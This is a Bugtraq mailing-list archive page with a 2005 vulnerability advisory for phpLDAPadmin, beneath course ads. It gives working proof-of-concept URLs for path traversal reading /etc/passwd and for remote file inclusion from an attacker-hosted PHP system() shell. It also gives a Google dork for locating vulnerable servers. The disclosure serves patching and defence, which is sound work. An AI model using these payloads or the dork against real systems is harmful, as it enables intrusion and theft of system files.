Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]

phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system discl

Subject: phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure,
Date: 29 Aug 2005 21:35:04 -0000
phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure,
remote code execution, cross site scripting

software:
author site: http://phpldapadmin.sourceforge.net/
description: phpLDAPadmin is a web-based LDAP client. It provides easy,
anywhere-accessible, multi-language administration for your LDAP server

if unpatched and vulnerable, a user can see any file on target system, poc:

http://[target]/[path]/phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd

a user can also execute arbitrary php code and system commands:

http://[target][path]/phpldapadmin/welcome.php?custom_welcome_page=http://[evil_site]/cmd.gif

where cmd.gif is a file like this:

<?php system('[some_command]); ?>  

also a user can craft a malicious url to include malicious client side code that
will be executed in the security contest of the victim browser

googledork: phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | 
inurl:login.php | inurl:donate.php 

rgod
site: http://rgod.altervista.org
email: retrogod at aliceposta.it

original advisory: http://www.rgod.altervista.org/phpldap.html


<Prev in Thread] Current Thread [Next in Thread>
  • phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure,, retrogod <=